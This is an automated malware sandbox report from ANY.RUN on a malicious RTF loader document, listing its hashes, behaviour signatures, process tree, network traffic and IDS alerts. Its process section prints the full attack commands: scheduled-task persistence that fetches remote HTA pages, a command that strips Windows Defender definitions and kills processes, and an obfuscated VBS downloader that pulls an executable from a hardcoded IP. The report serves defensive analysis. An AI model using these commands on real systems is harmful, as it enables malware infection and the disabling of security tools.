analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0001.doc

Full analysis: https://app.any.run/tasks/1a4bb567-63f6-4c47-bdaf-79f54909f628
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 23, 2019, 09:58:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, ANSI
MD5:

6D5EEF8F3DF1D7730F7FF22A4B13B23F

SHA1:

9452DB4D96BA98D72629AC1EB50E4FAE55F7F401

SHA256:

E3C786FEC0479F5AF52D7740E77479014C8863E5E9F0C639095595D999C2D80F

SSDEEP:

6144:kX0OPX0OVX0OiX0OXX0O0X0OrX0OxX0Oy:kv1C3ULRS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 3640)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3640)
    • Changes settings of System certificates

      • mshta.exe (PID: 2456)
    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 2456)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2572)
    • Uses TASKKILL.EXE to kill antiviruses

      • cmd.exe (PID: 3284)
    • Downloads executable files from the Internet

      • WScript.exe (PID: 3244)
    • Downloads executable files from IP

      • WScript.exe (PID: 3244)
    • Application was dropped or rewritten from another process

      • AVASTINT.EXE (PID: 3156)
  • SUSPICIOUS

    • Adds / modifies Windows certificates

      • mshta.exe (PID: 2456)
    • Creates files in the user directory

      • mshta.exe (PID: 2456)
    • Executes scripts

      • cmd.exe (PID: 3824)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 3284)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2456)
    • Executable content was dropped or overwritten

      • WScript.exe (PID: 3244)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 3284)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2936)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3640)
      • WINWORD.EXE (PID: 2936)
    • Reads internet explorer settings

      • mshta.exe (PID: 2456)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
17
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs mshta.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs mpcmdrun.exe no specs taskkill.exe no specs wscript.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs timeout.exe no specs avastint.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2936"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0001.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1
Version:
14.0.6024.1000
3640"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
2456mshta.exe https://methodsofcreation.blogspot.com/p/encryption2.htmlC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2572"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 20 /tn "MSOFFICE" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://tinytech997.blogspot.com/p/loader.html\",0,true)(window.close)" /FC:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3284"C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im mshta.exe & taskkill /f /im MSASCuiL.exe & taskkill /f /im MpCmdRun.exe & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3824"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo AmmEiqWkls = "http://216.170.120.102/kates.exe">>UpdateWindow.vbs &@echo ZIMMER = L0u("NcN`aV[a;ReR")>>UpdateWindow.vbs &@echo Set ZIMMERing = CreateObject(L0u("Z`eZY?;eZYUaa]"))>>UpdateWindow.vbs &@echo ZIMMERing.Open L0u("TRa"), AmmEiqWkls, False>>UpdateWindow.vbs &@echo ZIMMERing.send ("")>>UpdateWindow.vbs &@echo Set FatherOFVidus = CreateObject(L0u("NQ\QO;`a_RNZ"))>>UpdateWindow.vbs &@echo FatherOFVidus.Open>>UpdateWindow.vbs &@echo FatherOFVidus.Type = 1 >>UpdateWindow.vbs &@echo FatherOFVidus.Write ZIMMERing.ResponseBody>>UpdateWindow.vbs & @echo FatherOFVidus.Position = 0 >>UpdateWindow.vbs &@echo FatherOFVidus.SaveToFile ZIMMER, 2 >>UpdateWindow.vbs &@echo FatherOFVidus.Close>>UpdateWindow.vbs &@echo function L0u(K4d) >> UpdateWindow.vbs &@echo For Dintannaa = 1 To Len(K4d) >>UpdateWindow.vbs &@echo BuEllWsWam = Mid(K4d, Dintannaa, 1) >>UpdateWindow.vbs &@echo BuEllWsWam = Chr(Asc(BuEllWsWam)- 13) >>UpdateWindow.vbs &@echo VuzEgEas = VuzEgEas + BuEllWsWam >> UpdateWindow.vbs &@echo Next >>UpdateWindow.vbs &@echo L0u = VuzEgEas >>UpdateWindow.vbs &@echo End Function >>UpdateWindow.vbs& UpdateWindow.vbs &dEl UpdateWindow.vbs & timeout 12 & AVASTINT.EXEC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2148MpCmdRun.exe -removedefinitions -dynamicsignatures C:\Program Files\Windows Defender\MpCmdRun.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Malware Protection Command Line Utility
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3796taskkill /f /im winword.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3244"C:\Windows\System32\WScript.exe" "C:\Users\Public\UpdateWindow.vbs" C:\Windows\System32\WScript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2840taskkill /f /im excel.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
720
Read events
584
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
4
Text files
44
Unknown types
5

Dropped files

PID
Process
Filename
Type
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6A92.tmp.cvr
MD5:
SHA256:
3640EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR7252.tmp.cvr
MD5:
SHA256:
2456mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\864213505-ieretrofit[1].jstext
MD5:364501E083769DD2522BD01655BF399D
SHA256:0C20A9CE611E3EE5B32F6FF83F04D64EC7CFE867139AD51AA4E4AF210E1C9832
2936WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6474936BCF9E0E40D986D76CB8B97569
SHA256:A429E08BF13A763B1E1B56C70E9C488FD3A3D63556417F9C15A5F53B8F3D1253
2456mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\55386745-comment_from_post_iframe[1].jstext
MD5:8FDD1A424E6FE3906C9C6332DB5EBCDC
SHA256:FAD8434363C98D76F44710B07AFB477D7BBBC440215AE58D4AAE84F2995370A8
2456mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\plusone[1].jstext
MD5:E0D238A2B59C86393AB27378ABFA1131
SHA256:0015A708B6D2F12384EE780A36BCB03B5DF66A7DAC9DA2BF0E162F976019492B
2456mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\encryption2[1].htmlhtml
MD5:BABA72070D4936D361349B603F221C2E
SHA256:751248DE21B2DDAEADD17596611684F3B7339AB979E3EB89734489A391662B88
2456mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\cb=gapi[1].loaded_0text
MD5:631024A586183FD9E068B001B16D9CC2
SHA256:10D20CA09B83AF0FA108EEB59968E7F91CD6D4A50D7938D7B10B7029F063CC54
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61D93237.wmfwmf
MD5:F805B2269DCC910D671B2B45FE6CB033
SHA256:631983654C0F69751EB4AC2FD166981E1D7C1F895E1D8405D312092F310C0A3F
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\78A6338E.wmfwmf
MD5:846BFAE0506DC8B6F6D9F8DFA59C676E
SHA256:BEABD2F02A0C8087E08ED6591CA9A80C78ABBCF6E6C13EA918DF0352DD40BE68
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
13
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3244
WScript.exe
GET
200
216.170.120.102:80
http://216.170.120.102/kates.exe
US
executable
1.17 Mb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2456
mshta.exe
172.217.21.226:443
pagead2.googlesyndication.com
Google Inc.
US
whitelisted
2456
mshta.exe
172.217.22.73:443
www.blogger.com
Google Inc.
US
whitelisted
2456
mshta.exe
172.217.18.161:443
methodsofcreation.blogspot.com
Google Inc.
US
whitelisted
2456
mshta.exe
216.58.207.46:443
apis.google.com
Google Inc.
US
whitelisted
3244
WScript.exe
216.170.120.102:80
ColoCrossing
US
suspicious
2456
mshta.exe
172.217.18.13:443
accounts.google.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
methodsofcreation.blogspot.com
  • 172.217.18.161
whitelisted
www.blogger.com
  • 172.217.22.73
shared
apis.google.com
  • 216.58.207.46
whitelisted
pagead2.googlesyndication.com
  • 172.217.21.226
whitelisted
resources.blogblog.com
  • 172.217.22.73
whitelisted
img1.blogblog.com
  • 172.217.22.73
suspicious
accounts.google.com
  • 172.217.18.13
shared

Threats

PID
Process
Class
Message
3244
WScript.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3244
WScript.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3244
WScript.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3244
WScript.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3244
WScript.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info